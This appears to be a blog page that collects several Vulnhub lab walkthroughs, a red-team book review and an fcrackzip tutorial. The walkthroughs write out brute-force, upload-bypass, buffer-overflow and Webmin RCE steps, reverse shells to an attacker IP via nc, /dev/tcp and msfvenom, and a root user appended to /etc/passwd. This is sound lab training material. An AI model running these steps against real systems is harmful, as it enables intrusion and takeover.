Hacking Articles|Raj Chandel's Blog

Broken: Gallery Vulnhub Walkthrough

We have another CTF challenges for CTF players that named as “Broken” and it can be download from vulnhub fromhere. The credit goes “Avraham Cohen” for designing this VM machine for beginners. This is Linux based CTF challenge where you can use your basic pentest skill for Compromising this VM to escalate the root privilege shell.

Penetration Testing Methodologies

Network Scanning

· Netdiscover

· Nmap

Enumeration

Exploiting

· Brute Force

· Post enumeration

Privilgege escalation

· Abusing sudo rights

Walkthrough

Network Scanning

Let’s begin with network scan using netdisover to identify the host machine IP.

netdiscover

And this gave 192.168.1.107as Host IP, now we will move toward ports and service scan further.

For deep network scan we always prefer to use nmap aggressive scan and this time also we will go with the same approach, thus will run the below command to enumerate running services and open port.

nmap -A 192.168.1.107

From its scan result we found port 22 and 80 is open for SSH and HTTP service respectively.

Enumeration

For more detail we need to start enumeration against the host machine therefore we navigate to web browser for exploring HTTP service.

We obtained some files as shown in the given below image. Thus, we downloaded and explored each file but didn’t found any remarkable clue for further move.

Considering above file name could be helpful in generating a wordlist for brute force attack, I saved above file names and all relevant hint in two text files and named them “user” & “pwd” as shown below.

Exploiting

Now it was time to use hydra for making brute force attack on port 22 for SSH login thus we run below command in our local machine.

hydra -L user -P pwd 192.168.1.107 ssh

Great!! It works and we have broken:broken as SSH login credential.

With the help of above credential, we logged in and access the low privilege through user broken and notice that he has sudo rights for timedatectland reboot to be execute with root privilege.

Privilege Escalation

To escalate the root privilege, we went for post enumerating and looked for .bash_history file.

In this file we noticed some interesting action has been performed by author which was pointing towards a file name “password-policy.sh” that exist inside /etc/init.d moreover a command to set time-date using “timedatectl” command and much more.

Very fast we open the password-policy.sh that exist inside /etc/init.d and found the a command for change the root password into “TodayIsAgoodDay” when met to the specific condition that i.e time-date.

So we run timedatectl command along sudo permissions and to set date and time and then reboot the machine as followed in the below commands

sudo timedatectl set-time '2015-11-20 16:14:50'

sudo /sbin/reboot

Now we again connect to host machine via ssh as done previously and then try to access root shell by switching the user account. As we were hoping the password should changed into “TodayIsAgoodDay” therefore we use it as for login as root.

Yes, it works, and we have successfully obtain the root shell and with this the task finished here.

Recently I had the pleasure and honor to be asked for adding my review for the Hands-on Red Team Tactics- A Red Team Edition book. As this book is published in September 2018 thence it covers all latest track of evasions and attacks.

I appreciate the great effort has been done by “Himanshu Sharma” who is an Indian Ethical Hacker and has already achieved fame for finding security loopholes and vulnerabilities in Apple, Google, Microsoft, Facebook, Adobe, Uber, AT&T, Avira, and many more with hall of fame listings. And, “Harpreet Singh” who has more than 5 years experience in the field of Ethical Hacking, Penetration Testing, and Red Teaming. Harpreet is an Offensive Security Certified Professional (OSCP) and Offensive Security Wireless Professional (OSWP).

Adding Especial Thanks to “Raj Chandel” and “Aarti Singh” for assisting me to comprehend the concept of red team operation in most effective way.

While reading this book I found it has covered some very advanced and useful tools for performing red team practice that I generally use while performing red team operation therefore I feel this book is virtuous resource for those who wishes to enhance their skills from traditional VAPT.

Book Overview

Red Teaming is used to enhance security by performing simulated attacks on the organization in order to detect network and system vulnerabilities. Hands-On Red Team Tactics starts with an overview of pentesting and Red Teaming, before giving an introduction of few of the latest pentesting tools. You will then move on to exploring Metasploit and getting to grips with Armitage. Once you have studied the basics, you will understand Cobalt Strike basic, usage and how to set up a team server of Cobalt Strike.

You will discover some common lesser known techniques for pivoting and how to pivot over SSH, before using Cobalt Strike to pivot. This comprehensive guide demonstrates the advanced methods of post-exploitation using Cobalt Strike and introduces you to Command-and-control servers (C2) and Redirectors. All this will help you achieve persistence using Beacons and Data Exfiltration, and will also give you the chance to run through the methodology to use Red Team activity tools like Empire during a Red Team activity on Active Directory and Domain Controller.

By the end of the book, you will have learned advanced penetration testing tools, techniques to get reverse shells over encrypted channels and processes for post- exploitation. In addition to this, you will explore frameworks such as Empire which include maintaining persistent access, staying untraceable, and getting reverse connections over different C2 covert channels.

Key Features

· Target a complex enterprise environment in a red team activity

· Detect threats and respond to them with a real-world cyber-attack simulation

· Explore advanced penetration testing tools and techniques

Who this book is for?

Hands-On Red Team Tactics is for you if you are an IT professional, pentester, security consultant, or ethical hacker interested in the IT security domain and wants to go beyond Penetration Testing. Prior knowledge of penetration testing is beneficial.

What you will learn

· Get started with red team engagements using less common methods

· Explore a variety of post-exploitation techniques

· Get acquainted with all the tools and frameworks included in the Metasploit framework

· Discover how you can gain stealth access to systems via red teaming

· Understand the concept of redirectors to add further anonymity to your C2

· Work through a range of uncommon data exfiltration techniques

What this book covers ?

Chapter 1:Red-Teaming and Pentesting, helps you understand about different standards of pentesting followed across the industry, and we went through the seven phases of the PTES standard in detail.

Chapter 2:Pentesting 2018, introduces you to MSF Payload Creator (MSFPC). We will also look at the use of resource files which were generated by MSFPC besides the payload file.

Chapter 3:Foreplay – Metasploit Basics, teaches you about team server and the Armitage client, including the setup and usage of Armitage.

Chapter 4:Getting Started with Cobalt Strike, starts by exploring the red-team exercise as well as the concept of the cyber kill chain, which can be used for an attack plan. The chapter then introduces you to Cobalt Strike, the tool that is used for red-team operations.

Chapter 5:./ReverseShell, explores what a reverse connection and reverse shell connection is using various tools. Furthermore, we will try different payloads to get reverse shell connections using Metasploit.

Chapter 6:Pivoting, dives into port forwarding and its uses. We will also learn about pivoting and its uses, followed by methods of port forwarding via SSH.

Chapter 7: Age of Empire – The beginning, introduces you to Empire and its fundamentals.

We will also cover Empire's basic usage and the post exploitation basics for Windows, Linux and OSX.

Chapter 8: Age of Empire – Owning Domain Controllers, delves into some more advanced uses of the Empire tool to get access to the Domain Controller.

Chapter 9:Cobalt Strike – Red Team Operations, teaches you about the listener module of Cobalt Strike along with its type and usage.

Chapter 10: C2 – Master of Puppets, provides an introduction to command and control (C2) servers and discussed how they are used in a red team operation.

Chapter 11:Obfuscate C2s – Introducing Redirectors, introduces you to redirectors and the reason why obfuscating C2s are required. We have also covered how we can obfuscate C2s in a secure manner so that we can protect our C2s from getting detected by the Blue team.

Chapter 12:Achieving Persistence, dives into achieving persistence using Armitage's inbuilt exploit modules, then we will learn how to do the same via Empire on Windows, Linux, and macOS machines.

Chapter 13: Data Exfiltration, discusses about some basic ways of transferring data using simple tools like Netcat, OpenSSL and PowerShell. Next, we jumped into transforming the data using text-based steganography to avoid detection, as well as looking at the usage of the CloakifyFactory tool.

This book is available on Amazon you can buy this from given below link:

https://www.amazon.com/Hands-Red-Team-Tactics-operations-ebook/dp/B07GVPGFTL/ref=sr_1_1?keywords=Hands-on+Red+Team+Tactics&qid=1566357945&s=audible&sr=8-1

In this article, we are going to discuss fcrackzip which is a third-party tool for cracking zip files passwords. It is a best tool as it tries to search zipfile for encrypted files and tries to guess their password. Here, we have discussed each option available in fcrackzip so that we can use this tool to its best of potential.

There are many cases where an individual type an incorrect password. And unzip reacts quickly to it, it doesn’t even need to decrypt the whole file. While the encryption algorithm used by zip is relatively secure, fcrackzip made cracking easy by providing hooks for very fast password-cracking, directly in the zip file. Understanding these is crucial to zip password cracking.

Every password’s first twelve bytes are decrypted initially. Depending on the version of zip used to encrypt the file, the first ten or eleven bytes are random, followed by one or two bytes whose values are stored elsewhere in the zip file, i.e. are known beforehand. The password is considered wrong when the last bytes do not match. The only method to determine that whether the password I correct or not, we need to unzip the file and compare the uncompressed length and crc’s.

Earlier versions of pkzip stored two known bytes. Thus, the error rate was roughly 1/2¹⁶=0.01%. pkware ‘improved’ the security of their format by only including one byte, so the possibility of false passwords is now raised to 0.4%. Unfortunately, there is no real way to distinguish one byte from two-byte formats, so we have to be conservative.

Introduction to fcrackzip

We frequently use zipped files due to its small size and encryption algorithm. These zipped files come with a facility of password protection which maintains the security of the files.

When u have lost the password, and the problem arises of how to crack it, fcrack comes to the rescue to save and provide you with the way out in order to protect your documents. Simple way to crack a protected zip file with the help of fcrackzip which is available under linux.

Fcrackzip is a free/fast zip password cracker, It was written by Marc lehmann <pcg@goof.com>. It was not the fastest zip cracker available, but to provide a portable, free, but still fast zip password cracker.

Multiple feature of fcrackzip

As we are using Kali linux, fcrackzip tool is installed by default, we just need to open the terminal and just type “fcrackzip --help” and its help command will run and greet you.

· -b: for using brute force algorithms.

· -D: for using dictionary.

· -B: execute a small benchmark.

· -c: use characters from charset.

· -h: show the help message.

· --version: show the version of this program.

· -V: validate or check the algorithm.

· -v: for verbose mode.

· -p: for using a string as a password.

· -l: for providing a specific length to password.

· -u: for weed out wrong passwords.

· -m: to specify the method number.

Creating a password protected zip file

Firstly, we have to create a password protected file in that process we need select that file which we want to secure with that format, after selecting that file we need to follow the command.

Syntax: zip --password

Cracking the password of zip file

fcrackzip is a very impactful tool and also quite easy to use for making a brute force attack on any zip file, for that we need to use different-different format for cracking the password of the zip file. In order to that we (-b) which allow us to brute force on that zip file, (-c) which define the charset for the dictionary to brute force.

fcrackzip -b -c 'a' file.zip

In the above result we are seeing all the possible outcomes of the attack if we want to wipe out the wrong passwords we can use (-u) which allow us to see only the correct outcome through the result.

fcrackzip -b -c 'a' -u file.zip

Verbose mode

In fcrackzip, verbose is a mode which can be intiated using (-v) parameter. Now verbose mode generates extended information. In our case verbose mode help us to get information about file in that password protected zip file, like size of that file, name of that file etc., And the current combination of dictionary which is applied on that zip file.

fcrackzip -b -v -c 'a' -u file.zip

Cracking numeric password with specific length

for that we have created a numeric password protected zip file with the same command which we use earlier to create a password protected zip file.

In this case we use to 2 different parameters like (-c ‘1’) we use that parameter earlier but that we use this for different purpose now we are using this for applying numeric charset. Second parameter is (-l)

this parameter is use to specify the length of the password (minimum length – maximum length).

zip --password 123 raj.zip user.txt

fcrackzip -b -v -c 'a' -l 1-3 -u raj.zip

Providing intial password

In this parameter we are providing a set initial password for brute force with the name string to supply passwords for dictionary searching, through this we can provide them the set of strings to add those keywords in their dictionary.

fcrackzip -b -v -c 'a' -p ignite -u file.zip

Dictionary Traversing

In this mode fcrackzip will read the passwords from a file that is given by us, that file must contain one password per line and should be alphabetically ordered, so that fcrackzip will work according to its default working.

fcrackzip -D -p rockyou.txt file.zip

Different method

In this parameter we are using different method than default for our cracking process the switch --help will print a list of available methods, and we can use --benchmark to see which method is best for our machine, use method number instead of the default cracking method.

fcrackzip -b -v -c 'a' -m 1 -u file.zip

Benchmark

This parameter is help us to findout which method of fcrackzip is more imapactfull in your machine by calculating a benchmarkscore.

Fcrackzip -B

Today we are going to take on a new challenge KFIOFan2. The credit for making this VM machine goes to “Khaos Farbauti Ibn Oblivion” and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here

Security Level: Beginner

Penetrating Methodology:

Scanning

· Netdiscover

· Nmap

Enumeration

· Enumerating ftp services

Exploitation

· Uploading php shell to get ssh key

Privilege Escalation

· Buffer Overflow to get sudo rights

Walkthrough:

Scanning:

First thing first, scan the vulnerable machine using nmap

nmap -p- -A 192.168.1.33

Here we found that the only port open is port 26921

Let’s take a look at what the ftp service has to offer. The ssh banner gave us a message

“Salut Alice ! Suite a l'attaque sur notre precedent serveur, j'en prepare un nouveau qui sera bien plus securise ! C'est en travaux pour l'instant donc s'il te plait ne touche a rien pour l'instant... Bob”

Which translates to

“Hi Alice! Following the attack on our previous server, I prepare a new one that will be much more secure! It is under construction for now so please do not touch anything for now ... Bob”

We found anonymous login here. After logging in, we found 4 images and a directory named `serrure`. We downloaded the images and checked the directory but found nothing in the directory

After getting not much information but only 4 images, we tried to decipher the hint behind this so we tried to find any kind of stegnographical content. So we tried to get some kind of information from the images by another method. We combined the images together and found that the catch was very simple. In the centre of the combined image we found a name of a file named as “cle.txt”.

We tried to find this file but did not find it anywhere. So we tried to do a little bit different step. We created a file with dummy content and put it into the target system through ftp

After putting the file in the serruredirectory, we tried to scan the target system again. Looks like the cle.txt file worked as a key to unlock another port 26980 running http service

nmap –p- -A 192.168.1.33

Now that we have found one other port, we tried to enumerate the website but the welcome message looked something like this

“Tout ce qui est, est père du mensonge et fils du néant”

Which translates into

“All that is, is father of lies and sons of nothingness”

While analysing the page source of the webpage, we found a comment something like this

“”

Which translates into

“<! - Test presence cle.txt file: OK ->”

“<! - Test content cle.txt file: Error ->”

Indicating that the content of cle.txt file needs to be changed

Alongside this we tried to get more details about the target machine and found a directory named uploads, but with none content

Now to put the correct content in the cle.txt file, we tried to look for a meaning for the hint. After some research, we found an article written by the author of this lab. In this article we found that the hint is the description of the authors nickname i.e. Khaos Farbauti Ibn Oblivion.

We used this name as content of the cle.txt and replace this file in the serrure directory through ftp

echo “Khaos Farbuti Ibn Oblivion” > cle.txt

ftp 192.168.1.3326921

cd serure

delete cle.txt

put cle.txt

Now let’s check the webpage again. This time we found a file upload module in place, looks like the content of cle.txt file was being used to change the functioning of webpage. Now all we need to do is upload a shell, first we tried to upload a txt file and the was uploaded easily

Next we tried uploading a php shell but was blocked

To bypass the security we tried to upload a .php5 shell and succeded

Now to verify that our shell is uploaded, we tried to check the uploads directory and found that our file is there

Now we tried to execute the shell but failed, after some attempts we thought that there might be a .htaccess which might be blocking us from executing a php application. So to override that we needed to over-write the previous one, we tried to create a blank .htaccess file and tried to upload that.

As we were able to upload the .htaccess file we tried to use the uploaded shell to run system commands and were able to do that.

After some searching we found a ssh key

Now all we need to find is a ssh port to connect. We did nmap scan again and this time we found an ssh port on 26922

nmap -p- -A 192.168.1.33

Now we have a ssh port and a ssh key, lets try to combine them together and get a ssh connection. We saved the ssh key into a file named id_rsa, provided it 0600 permission and tried to use that key for connection. Once getting the connection we tried to find all the files with suid permissions and found that there is a file named test

chmod 0600 id_rsa

ssh bob@192.168.1.33-p 26922 -i id_rsa

find / -perm –u=s –type f 2>/dev/null

When we tried to execute the file, it asked us for password and we don’t have any. We tried to check the strings in the file using the strings command and found some interesting things.

strings test

First we found that there is a system function in use, meaning there is a system command being executed.

Second we found a system command “touch /root/authorize_bob” indicating that this is the system command that we want to be executed

Third we found a string “aliceestnulle” right below the password prompt “Mot de passe”

We tried to run the file again with the password that we found and got a message

As we were not able to get anything even after entering correct password, we tried to get to get details from gdb

gdb test

set disassembly-flavor intel

disassemble main

start

We started the execution of the program using start command, when the program asked for password, we tried to discover buffer overflow vulnerability. We created a input string of length 50 using pattern_create.rb file from metasploit-framework.

cd /usr/share/metasploitable-framework/tools/exploit

./pattern_create.rb -l 50

After putting the input we found that after certain length our input is put into an executable stack

Before going on multiple types of buffer overflow exploitation, we went to our previous findings just to check whether we have some other hints to follow, fortunately we found that when we found the touch command in the strings command output, right above that there was a string having content as

lancement debug

when we translated this it resulted in

launch debug

when we tried to check the debug function, we found that there is a system function being executed inside the debug function.

disassemble debug

Next we are left with the attempt to execute the debug function, so with took the length of the string which resulted in buffer overflow, and replaced the characters which were stored in the executable stack with the address of the debug function.

python -c ‘print (“Aa0Aa1Aa2Aa3Aa4Aa5Aa6”+”\x20\x48\x55\x55\x55\x55”)’ | ./test

After running the same input for multiple attempts, we logged out of the ssh session and reconnected and tried sudo command and it worked.

ssh bob@192.168.1.33-p 26922 -i id_rsa

sudo su

Let’s capture the flag and get finished with the CTF

cd /root

cat flag.txt

Today we are going to solve another CTF challenge called “Nezuko: 1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to yunaranyancat. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

· Netdiscover

· Nmap

Enumeration

· Browsing HTTP Service

· Browsing Webmin Service

· Enumerating Webmin Service

Exploiting

· Exploiting Remote Code Execution Vulnerability

· Get Shell

· Enumerate for Flag

Privilege Escalation

· Readable /etc/passwd file

· Cracking hash using John The Ripper

· Creating reverse bash script using msfvenom

· Editing script scheduled to auto run

· Get Escalated Shell

· Enumerate for flag

Capture the flag

Walkthrough

Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box. After running the lab, we used the netdiscover command to check the IP Address of the lab.

netdiscover

This was found out to be 192.168.1.105.

Now we will run an aggressive scan using nmap for proceed further.

nmap -A 192.168.1.105

From its result, we found ports 22(SSH), 80(HTTP), 13337(MiniServ) were open.

Enumeration

For more detail we will be needing to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service.

We obtained an image of Nezuko anime character as shown in the given below image.

This webpage turned out to be a waste of time as we were not being able to extract anything from here. It’s time to explore other ports. Next one in our port scan was 13337. So we browsed to that port and it gave us the login panel of Webmin as shown in the image.

Exploiting

As we were not able to get out hands on credentials in our initial enumeration. We will have to figure out a different way to get through this Authorization Login Panel of Webmin. In our initial port scan, we figured out that our target machine is running the Webmin Version 1.920. So we used the searchsploit to search for any available exploits.

searchsploit Webmin 1.920

This gave us the Remote Code Execution(RCE) Exploit. Now let’s download this exploit script using the -m parameter of the searchsploit command.

searchsploit -m 47293

Now let’s read the contents of the exploit as well understand the usage of the exploit.

cat 47293.sh

We saw that the exploit checks the Vulnerability through the RCE and returns the arguments “Vulnerable “or “Target is not Vulnerable”. But we want to gain a remote shell on target system. So we modified the exploit script to generate a netcat session from the target machine as shown in the image. We renamed the file to “shell.sh” as it is easier to remember than “47293”.

nano shell.sh

nc -e /bin/bash [Attacker IP] [Port]

Here, we have the IP Address of our Attacker Machine (Kali Linux) is 192.168.1.106.

Now, let’s execute the shell script with the target IP address and Port as parameters. But before executing this shell script, we will initiate a netcat listener to receive the reverse shell.

sh shell.sh https://192.168.1.105:13337

We started this netcat listener as discussed earlier. And as the shell script was executed we got an improper shell of the target machine. We used the python one-line to convert it into a proper shell.

nc -lvp 1337

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

We can see that we have got the shell as the user Nezuko. We enumerated further using the ls command. This gave us that we have a directory named “from_zenitsu” as well as a text file named nezuko.txt. When we further investigated we saw that a message is received every 5 minutes. As the directory is named “from_zenitsu”, we assumed that there must be a user by that name.

cd from_zenitsu

But let’s also open the nezukto.txt file. It is our first flag. Now we will have to escalate privilege on this machine.

cat nezuko.txt

Privilege Escalation

We were looking for a user named zenitsu, so we thought to check if the /etc/passwd file is readable or not. It was readable. And we found a user named zenitsu as shown in the given image.

cat /etc/passwd

We used the John The Ripper to crack the password hash of the user zenitsu. As shown in the image, it is “meowmeow”.

john hash --show

Now, as we have the credentials of the user zenitsu, let’s traverse to that user.

su zenitsu

We entered the password “meowmeow” as shown in the image.

cd to_nezuko

ls –la send_message_to_nezuko.sh

Now it’s time to enumerate this user as well. Here, on close inspection, we found a directory named “to_nezuko”. In this directory, we found the script that sends those messages to nezuko. We checked the permission of the script and found out that it runs with elevated privileges.

Now we created a reverse bash shell using the msfvenom, as shown in the given image to get a root shell on the target machine. We choose the format of payload to be Raw. We did this so that we can have the script available to us as shown in the given image.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.106 lport=1234 R

We used the echo command as the zenitsu user, to edit the send_message_to_nezuko.sh file. We altered our shell code in the script. Now as we observed earlier, this script gets executed every 5 minutes. So we will wait for it to execute.

echo “0<&60-;exec 60<>/dev/tcp/192.168.1.106/1234;sh <&60 >&60 2>&60” >>

send_message_to_nezuko.sh

In order to receive the shell, we started a netcat listener on the port that we mentioned while creating the payload. And after waiting for 5 minutes, we have the shell, here we found the root.txt. This was our final flag.

nc -lvp 1234

cd /root

cat root.txt

This was a good lab that made us understand some important aspects of scheduled tasks between users on a same machine. As well as to exploit a Webmin Panel.

Today we are going to solve another boot2root challenge called “GrimTheRipper: 1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. This credit of making this lab goes to Manish Chandra. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning

· Netdiscover

· Nmap

Enumeration

· Browsing HTTP Service

· Directory Bruteforce using dirb

· Enumerating Webpage using View Page Source

· Decoding Base64 Hints

· Browsing Hidden Directories

Exploiting

· Bruteforcing using wpscan

· Using Metasploit wp_admin_shell_upload exploit

Privilege Escalation

· Enumerating for Linux Version

· Searching and Getting Kernel Exploit using Searchsploit

· Compile and run the Kernel Exploit

Walkthrough

Network Scanning

We will be running this lab in a Virtual Machine Player or Virtual Box. After running the lab, we used the netdiscover command to check the IP Address of the lab.

netdiscover

This was found out to be 192.168.0.8.

Now we will run an aggressive scan using nmap for proceed further.

nmap -A 192.168.0.8

From its result, we found ports 22(SSH), 80(HTTP) were open.

Enumeration

For more detail we will be needing to start enumeration against the host machine. Therefore, we will navigate to a web browser for exploring HTTP service.

We obtained an image of Kevin Hart as shown in the given below image.

As this proved out to be a dead end, we tried to further enumerate the target machine through a directory Bruteforce. For this we are going to use the dirb tool. This gave us a page named “index2”.

On opening it in our browser we get this message “You lost dumb shit??” along with another meme.

But we felt something fishy with this image. So, we viewed the Page Source of the image. This gave us a clue which was commented as shown in the given image.

On the first view, it seemed to be Base64 Encoding. So, we tried decoding it as shown in the given image below. On first decoding we are given another Base 64 encoded message “Try Harder”. So we decoded it again to get a binary code.

echo ‘THpFd0f1UQXhNREU9IHRyeSBoYXJk’ | base64 -d

echo ‘LzEwMTAxMDE=’ | base64 -d

We tried to decode this binary code but it was worthless. So, we tried to use this as a possible directory. On opening it we got the wordpress directory as shown in the image given below.

So, we opened the wordpress directory, It was looking like a normal wordpress site. But we couldn’t find anything suspicious from the first view.

Exploiting

So, to proceed further, we took the help of wpscan to bruteforce into the admin panel.

wpscan --url http://192.168.0.8/1010101/wordpress/ -U /usr/share/wordlists/rockyou.txt

Here we got through the bruteforce and got the credentials for the login:

Username: admin

Password: Password@123

Note: The password that was extracted starts from ‘P’ and rockyou.txt is alphabetical arranged so it takes a lot of time to crack.

Now that we have the login credentials, let’s get the shell through the wp_admin_shell_upload in Metasploit. First, we with the help of use command we will select the exploit in Metasploit Framework. After that we will select the Remote host IP Address, followed by the username and password that we extracted earlier and after that we will use exploit command to run the exploit. Here, we have ran the exploit multiple time because it doesn’t get through single time. We have to apply multiple times as we did.

use exploit/unix/webapp/wp_admin_shell_upload

set rhosts 192.168.0.8

set username admin

set password Password@123

set targeturi /1010101/wordpress/

exploit

Now that we have the meterpreter, we ran the shell command to get the bash shell on the target system. Form this we got the improper shell, which we converted into a proper shell using the python one liner. After we had the proper shell, we ran the lsb_release command to get the information about the Linux version on the target machine. It found out to be 12.04 as shown in the image.

shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

lsb_release -a

Now, that we have the Ubuntu Version, we decided to escalate privilege using a Kernel Exploit. We used the searchsploit for this. We selected the exploit and download it using -m parameter of the searchsploit command. After downloading the exploit, we ran the python script to host the current directory on port 8000 as shown in the given image. We did this to transfer the exploit onto the target system.

searchsploit Ubuntu 12.04

searchsploit -m 37292

python -m SimpleHTTPServer

Now that we have hosted the exploit on the HTTP server, let’s download the exploit on the target system using the wget command. After downloading, we compiled the exploit using gcc to get the executable file which we named shell. After that we will provide proper privilege to the shell file and execute it to get the root shell as shown in the given image.

wget http://192.168..0.10:8000/37292.c

gcc 37292.c -o shell

chmod 777 shell

./shell

AI: Web: 1 Vulnhub Walkthrough

Today we are going to solve another CTF challenge called “AI: Web: 1”. It is available on Vulnhub for the purpose of Penetration Testing practices. This lab is not that difficult if we have the proper basic knowledge of cracking the labs. The credit for making this lab goes to Mohammad Ariful. Let’s start and learn how to successfully breach it.

Level: Intermediate

Since these labs are available on Vulnhub Website. We will be downloading the lab from this link.

Penetration Testing Methodology

Network Scanning

· Netdiscover

· Nmap

Enumeration

· Browsing HTTP Service

· Directory Bruteforce using dirb

· SQL Injection to find Credentials

Exploitation

· SQL Injection to invoke OS-Shell

Privilege Escalation

· Writable etc/passwd file

Walkthrough

Network Scanning

NOTE: For this Lab we will have to put the Network Setting of our Attacker Machine (Kali Linux) to NAT.

We will be running this lab in a Virtual Machine Player or Virtual Box. After running the lab, we used the netdiscover command tot check the IP Address of the lab.

netdiscover

This was found out to be 192.168.13.131.

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.13.131

We learned from the scan that we have the port 80 open which is hosting Apache httpd service. We also gained the information about a robots.txt file, /m3diNf0/, /se3reTdir777/uploads directory available to enumerate.

Since we got the port 80 open, we decided to browser the IP Address in the browser. It shows the following text” Not even Google search my contents!”.

Let’s browser another page which we got in our port scan. When we open the /m3diNf0/ in our browser we get a Forbidden Message as shown in the given image.

During our port scan, we found another directory named /se3reTdir777/uploads/. Let’s try to browser it. On opening it in our Web Browser, we get a similar Forbidden Message as earlier.

To further enumerate, we performed a Directory Bruteforce on the m3diNf0 directory. This gave us an info.php page as shown in the given image. This could be of some use.

dirb http://192.168.13.131/m3diNf0/

After finding the info.php page in the Directory bruteforce, we tried to browse this page on our browser. It opened up as shown in the given image. We will keep this aside as it gives us some valuable information for further.

Previously we tired to open the se3reTdir777/uploads. Now, we tried to browse the se3reTdir777 directory. It gives us a User ID Submission Form as shown in the image given below.

We tried to further enumerate the form by entering the “User ID” in the form, It tell us that there is an injection vulnerability here. We extracted the following information from it.:

Id : 1

First Name : admin

Last Name : admin

Now we entered User ID as 1 and captured the ongoing packet using BurpSuite. We did this because we are going to need it in the exploiting the SQL Injection through sqlmap.

We copied the request captured and created a text file and pasted it. We named the it req.txt. We will be using this request to exploit the SQL Injection. After working for a while, sql map extracted the “aiweb1” database as shown in the image given below.

sqlmap -r req.txt -D aiweb1 --dbs --batch

Now, to further enumerate, we used the --dump-all parameter. This will allow the sqlmap tool to dump all the data that it can find while exploiting the SQL Injection on our target machine.

sqlmap -r req.txt -D aiweb1 –dump-all --batch

After running the sqlmap with --dump-all parameter we get the usernames and encrypted passwords as shown in the image given below.

We copied the password form the terminal here and tried to decode them using the BurpSuite Decoder. After decoding, we have the following credentials.

Id	Username	Password
1	t00r	FakeUserPassw0rd
2	aiweb1pwn	MyEvilPass_f908sdaf9_sadfasf0sa
3	u3er	N0tThisOneAls0

Now that we have the credentials, we will try to invoke an os-shell using the sqlmap tool. Here we provided the Database name with the –os-shell as a parameter for sqlmap. After performing the exploitation, it gives us the option to choose the web application language which it supports. Here we are choosing PHP.

sqlmap -r req.txt -D aiweb1 –os-shell

Following the choice of the web application language we are asked if we want to provoke the full path disclosure. Here, we do want the full path so we answer yes. Now it asks the attacker the writable directory to be used for os shell. We chose the custom location.

Now we will use the info.php page that we found earlier. On a close inspection we found the Document Root for this particular server. We found it to be “/home/www/html/web1x443290o2sdf92213”.

So, in order to get the os shell, we will be entering this document root location into our custom location as shown in the image given below. And we got our os-shell on the target machine.

After getting the os shell, we ran the id command to check the user of which the shell is generated, Also, we tried to check if the /etc/passwd file is readable or not. It was readable. But this seemed like a dead end.

os-shell > id

os-shell > cat /etc/passwd

So, we went back to the sqlmap result. It showed us a link” /se3reTdir777/uploads/tmputvpz.php”. On opening we have the upload page as shown in the image given below. We can see that we have the browse button where we can choose the path of our file and provide the path on the victim system, the location we want the file to save.

We decided we will upload a php shell on this upload page. So, we edited the script to add the IP Address of out attacker machine.

We directed the path of the php shell and click on upload button. After clicking we see the message as shown in the given image

Now that we have successfully uploaded the shell file, it’s time to run the php file by browsing the file on the web browser as shown in the given image But we should run a .

As soon as we ran the shell, we got the shell in the netcat we started earlier. This gave us an improper shell; we will use the python one liner to convert it into proper shell. After getting the proper shell we will traverse into tmp directory. Here, we will use the LinEnum script to further enumerate the target machine as shown in the image given below.

nc -lvp 1234

python -c ‘import pty;pty.spawn(“/bin/bash”)’

www-data@aiweb:/$ cd /tmp

www-data@aiweb:/$ wget http://192.168.13.132:8000/LinEnum.sh

www-data@aiweb:/$ chmod 777 LinEnum.sh

www-data@aiweb:/$ ./LinEnum.sh

Here on a closer inspection we can see that we have the read/ write sensitive files as /etc/passwd.

As we have the /etc/passwd file writable, we will add a user in it with elevated privileges. To do this we will create the hash of that user using the openssl command. Here we created a user with salt user3, username as raj and password pass123.

openssl passwd -1 -salt user3 pass123

Now that we have the password hash let’s add our newly created user in the /etc/passwd file of the target machine. We did this using the echo command. Now let’s login as the new user. After that we traversed to the root directory to find the flag.txt as shown in the image given below.

www-data@aiweb1:/tmp$ echo ‘raj:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0::/root:/bin/bash’ >>/etc/passwd

www-data@aiweb1:/tmp$ tail /etc/passwd

www-data@aiweb1:/tmp$ su raj

www-data@aiweb1:/tmp$ cd /root

www-data@aiweb1:~# ls

www-data@aiweb1:~# cat flag.txt

II Method

We can solve the lab using another method as well. For this we will use the Metasploit Web Delivery payload. We created one with out attacker machine’s IP Address and server port. On running exploit, we will get a script as shown in the image given below.

msf5 > use exploit/multi/script/web_delivery

msf5 exploit(multi/script/web_delivery) > set lhost 192.168.13.132

msf5 exploit(multi/script/web_delivery) > set srvport 4567

msf5 exploit(multi/script/web_delivery) > exploit

We will run the script in the OS Shell we invoked earlier as shown in the image.

This gave us a meterpreter on the target machine as shown in the image given below

msf5 exploit(multi/script/web_delivery) > session 1

meterpreter > sysinfo

III Method

We could also solve this lab in yet another method, but this time we will use msfvenom for our exploitation. We will create an exploit using msfvenom using the payload cmd/unix/reverse_python. This generated a python script as shown in the image.

msfvenom -p cmd/unix/reverse_python lhost=192.168.13.132 lport=9876 R

Again, let’s get back to out OS Shell to enter the script we generated using msfvenom. We will execute the script as shown in the image given below.

Before executing we will run a netcat listener to capture the session generated through the python script. We have the shell over our target machine form this method too.

nc -lvp 9876

whoami

IV Method

We will try to get the shell over the target machine using another method. In this method we can execute the msfvenom generated script from the previous method. Now instead of running the netcat to capture the shell we will use Metasploit’s multi/handler. We will set the payload, IP Address and lport and run the exploit command. Now we will run the msfvenom generated script to give us the shell. Now we will use the convert shell into meterpreter.

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload cmd/unix/reverse_python

msf5 exploit(multi/handler) > set lhost 192.168.13.132

msf5 exploit(multi/handler) > set lport 9876

